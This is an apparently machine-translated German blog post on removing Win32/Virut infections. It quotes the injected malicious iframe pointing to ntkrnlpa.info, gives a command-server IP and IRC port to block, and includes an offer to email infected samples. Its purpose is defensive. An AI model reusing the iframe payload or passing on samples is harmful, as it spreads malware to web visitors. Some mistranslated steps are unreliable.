Ich fand dieses frustrierend, dass die meisten Anti-Virus-Produkt wird gelöscht oder unter Quarantäne Ihre infizierten Dateien. Ich habe viele Projekte, weil dieser Würmer. Nicht verwendet "auto-clean/fix" Online-Scanner, wenn Sie Ihre Projekte begünstigt. Unten ist Schritt für Schritte Fixes für win32/Virut. Wenn Sie nicht wie manuelle Bearbeitung benötigen Sie einen Such-und Ersetzen-Tools zum Entfernen des embed-Code innerhalb der infizierten Dateien.
- Stellen Sie sicher, dass alle der infizierten (win32/virtob *. exe-Dateien) wurde Quarantäne.
- Optional Block Outbound-Zugang zu 78.109.19.139:80 & IRC-Port 65520 in Ihrer Firewall-Einstellungen.
- Behindertengerechte AntiVirus falls vorhanden.
- Herunterfahren Ihrem PC ein und starten Sie Windows auf SafeMode (Drücken Sie F8 oder F5 nach BIOS-Bildschirm).
- Suche in allen Dateien mit *. htm, *. html, *. php, *. asp-Erweiterungen.
Löschen oder ersetzen Sie den folgenden Text (Zeichenketten)<iframe src="http://ntkrnlpa.info/cr/?i=1" height="1" width="1"> </ iframe>
Suchen und Ersetzen-Tools
- Für Windows - gibt es viele ähnliche Instrumente, und ich bin nicht sicher sind, welche ein zu empfehlen, da es offenbar die meisten haben die gleiche Sache so auf Google nach "Such-und-Ersetzen" Wähle deine besten.
- Für Cygwin oder * nix-bash-Konsole - Gebraucht sed Kommandos Suchen & Ersetzen-Strings in allen infizierten Dateien.
- Python in Fenster - Sie können versuchen, diese Lösungen.
Win32/Virut Virustotal.com Ergebnisse
Antivirus Version Letztes Update Ergebnis AHNLAB-V3 2007.11.12.0 2007.11.12 -- AntiVir 7.6.0.34 2007.11.12 W32/Virut.AF Authentium 4.93.8 2007.11.10 -- Avast 4.7.1074.0 2007.11.11 Win32: Virtob AVG 7.5.0.503 2007.11.11 Win32/Virut BitDefender 7/2 2007.11.12 Win32.Virtob.6.Gen CAT-QuickHeal 9,00 2007.11.12 W32.Virut.K ClamAV 0.91.2 2007.11.12 W32.Virut-5 DrWeb 4.44.0.09170 2007.11.12 Win32.Virut.19 ESAFE 7.0.15.0 2007.11.08 -- eTrust-VET 31.2.5289 2007.11.12 Win32/Virut.6375 Ewido 4,0 2007.11.12 -- FileAdvisor 1 2007.11.12 -- Fortinet 3.11.0.0 2007.10.19 W32/Virut.AE F-Prot 4.4.2.54 2007.11.10 W32/Injector.A.gen! Eldorado F-Secure 6.70.13030.0 2007.11.12 Virus.Win32.Virut.ab Ikarus T3.1.1.12 2007.11.12 Win32.Virtob.AS Kaspersky 7.0.0.125 2007.11.12 Virus.Win32.Virut.ab McAfee 5160 2007.11.09 W32/Virut.g Microsoft 1,3007 2007.11.12 Name: Win32/Virut.Q NOD32v2 2653 2007.11.12 -- Norman 5.80.02 2007.11.09 W32/Virut.W Panda 9.0.0.4 2007.11.11 W32/Virutas.W Prevx1 V2 2007.11.12 -- Rising 20.18.02.00 2007.11.12 Win32.Virut.z Sophos 4.23.0 2007.11.12 W32/Vetor-G Sunbelt 2.2.907.0 2007.11.09 VIPRE.Suspicious Symantec 10 2007.11.12 W32.Virut.W TheHacker 6.2.9.124 2007.11.12 W32/Virut.gen VBA32 3.12.2.4 2007.11.11 -- VirusBuster 4.3.26:9 2007.11.11 Win32.Virut.Gen.4 Webwasher-Gateway 6.0.1 2007.11.12 Win32.Virut.AF Hinweise zu Microsoft Windows Tool zum Entfernen bösartiger Software
Update On: Nov, 20 2007 durch NoahArk
Ich habe Win.32/virut Dateien in meinem Archiv (für Backup-Zwecke). Letzte Woche habe ich installiert Microsoft Windows-Tool zum Entfernen bösartiger Software v1.35 (Nov 13, 2007, 890830).
Microsoft behauptet, kann dieses Tool behebt w32/Virut. Aber das Ergebnis ist viel worsed als ich erwartet hatte. Es wird nicht erkennen Win32/Virut auf meinem Windows XP SP2 statt halber Strecke vor dem Scan seine Auslöser der Wurm und beginnt Verbreitung als Win32/virtob & Virut [AW] (infizieren *. exe & *. html). Ich hätte entfernt alle Microsoft-Tools zum Entfernen (MS Tool zum Entfernen bösartiger Software, Verteidiger MS, MS Baseline Security Analyzer). Microsoft Developer sollten besser wissen, wie um zu verhindern, dass die meisten dieser Art infections.Its ihre eigenen Fehler und Design-Produkte. Ich bin nach wie vor halten die infizierten Dateien Win32/Virut, wenn jemand es brauchen, schicken Sie bitte eine E-Mail an
. Meine Bitte an Microsoft Team, sie sollten sauber diesem crapy Würmer so dass alle diese unglücklichen Kunden (einschließlich mir) gewohnt haben, um jagen zu teuer Antivirus-Lösungen. W32/Virut und ntkrnlpa.info
Die Verbreitung von Würmern begann seit September 2006. Nach einem Jahr anniversay es noch in freier Wildbahn, wie es wird nie aufhören.
Ich würde ein Schreiben an ntkrnlpa.info ISP (hosting.ua), und sie haben geschlossen Festlegung der Standorte für gut. Und auch Google blockiert die Website zu geben, es wird Ihnen eine Abmahnung, wenn die Suche nach bestimmten URL.
Dieser Wurm verbreitet über einfache HTML-Tags und erhöht die Dateigröße um 8kb. Aufgrund dieser einfachen Methode und niedrige Schaden meisten Anti-Viren-und Sicherheits-Anbieter Etikett es als mittel-und niedrig. Der Thread Etikett ist fraglich.
Auf der Grundlage von Wikipedia "Usage Anteil der Web-Browser-Statistik", 81% der Internet-Nutzer ist mit Microsoft Internet Explorer (50% der Besucher dieses Weblog ist auf IE zu), IE-Browser nicht blockiert IFRAME, dass kann ein Problem sein.
Stellen Sie sich einige Webmaster hochgeladen einem infizierten Dateien auf stark befahrenen Webseiten wie MySpace und Facebook. Die Ergebnisse werden könnte Katastrophe. Niemand möchte, dass seine passiert.
Verwandte Einträge
- November 12, 2007 at 12:35
- 8. Februar 2008 an 10:58
- 0,3
- url
2 Responses to "Fixes für infizierte Dateien mit Win32/virut.Virtob und Varianten"
Trackback URL: Verwenden Sie die TrackBack-URL ↑ ping zu diesem Artikel. Wenn Ihr Blog unterstützt keine Trackbacks, sollten Sie vielleicht einen Kommentar hinterlassen statt.
"schreiben, als ob Sie sich unterhielten, ein guter Freund (vor Ihrer Mutter)."
. Was meinen Sie dazu?
Disclaimer: Für alle Inhalte, die Sie nach, Sie hiermit zu gewähren Kakkoi die gebührenfreie, unwiderrufliche, unbefristete, exklusive und vollständig sublizenzierbare Lizenz zu nutzen, zu reproduzieren, zu modifizieren, zu adaptieren, zu veröffentlichen, zu übersetzen, abgeleitete Arbeiten erstellen, verteilen, Durchführung und Anzeige solcher Inhalte im Ganzen oder in Teilen, weltweit und, um es in andere Werke, in jeglicher Form, Medien oder Technologie jetzt bekannt ist oder später entwickelt. Einige Rechte vorbehalten.
Das Problem bei der Prävention von Viren wie die Virut Arten ist, dass sie die "bothosts" sowie die als die Verschlüsselung mit jeder neuen Variante aus. Eine mögliche gute Lösung um zu verhindern, dass Ihre Maschine aus der unbefugten unerwünschte Verbindung von einem unbekannten Prozess oder Programm besteht darin, dass z. B. eine ZoneAlarm Firewall installiert (die den genau Sperrung von z. B. STMP für spezielle Program - der Standard ist "blockiert" -, bestimmten Port-Sperren (zB IRC), die Verhütung und leugnen jede unerbetene eingehenden Datenverkehr, als auch die adaptive IDENT-Port zu verstecken, (bedeutet, das ist eine echte Stealth-Firewall). angegebenen Sicherheit und Verhalten in Bezug auf Internet, Intranet, lokalen, sicheren Zonen, sowie eine 5-Schritt Sicherheits-Profil, um für spezielle Program).
Zusätzlich wird der Benutzer über jede Netzwerk-Aktion und den Zugang Versuche - ein-und ausgehende - mit Quelle,
Ziel-, Hafen-und das Programm oder Prozess Namen, die die Verbindung initiiert. Verhinderung von Spam-Bots Verhalten bedeutet: nur "Ihre" bekannten E-Mail-Programmen E-Mails zu senden. Speichern niemals Passwörter auf JEDER der Maschine oder in der E-Mail-Programm! Stellen Sie "SMTP-Aktion 'auf' Passwort erforderlich ', selbst wenn Ihr SMTP-Provider muss nicht (wenn ja, bedeutet dies, anonyme SMTP-gestattet ist, dann
haben eine schlechte Internet-Anbieter, die wirklich einladend Spambots zur Verbreitung ihrer berüchtigten Müll auf der ganzen Welt!).
Grundlegende Sicherheits-Vorschriften sind nach wie vor ignoriert von den Internet Service Provider in solchen Fällen. Mit dem gleichen Weg, die Kunden von solchen ISP sind die Opfer dieser. Gehen Sie suchen nach einem anderen ISP, wenn möglich. Alle anderen Programmen blockiert werden, sollten für SMTP (und IRC) Protokolle als gut. Das ist wichtig, in diesen Tagen, um eine infizierte Maschine ruhig auf die Internet-auch wenn es letztlich infiziert von einigen seltsamen Wurm, oder botclient Software. (Dann wird Ihr PC wird als "stoned" oder, wie es ist auch gesagt, die Sicherheit von Menschen, eine so genannte "Zombie"). Niemals zulassen HTTP oder jede andere ausgehende Ersuchen um anderen Programmen abgesehen von Ihrem Browser bekannt, Medien-Player oder
File-Transfer, E-Mail-und Chat-Programmen. Seien Sie sich bewusst, dass vor allem 'Adware', 'Nag-Ware "und" Spy-ware'-Programmen geladen werden immer versuchen, "Telefon privat'!
Gleiche tut Malware, die versucht zu erreichen oder zumindest hört auf ihre "Master-Hosts", (natürlich zulassen, dass solche für die Sicherheit von Einrichtungen auf Ihrem System zu aktualisieren, indem sie ihre bekannten Code-Hosts). Mit einer Host-Liste, die redirects dort enthaltenen Server zu nirgendwo (bedeutet die localhost) ist auch ein guter Tipp. Diese Datei wird auch gegen manipuliert (unbefugte Löschungen oder Ergänzungen durch eine Software oder Website-Skripten) von Software von Drittanbietern (zB ZoneAlarm, McAffee, NOD32).
Hi there
u können Sie mir diese E-Mail-Dateien, die ich einfach nur möchte, dass sie für das Lernen Zweck
DANKE BUDDY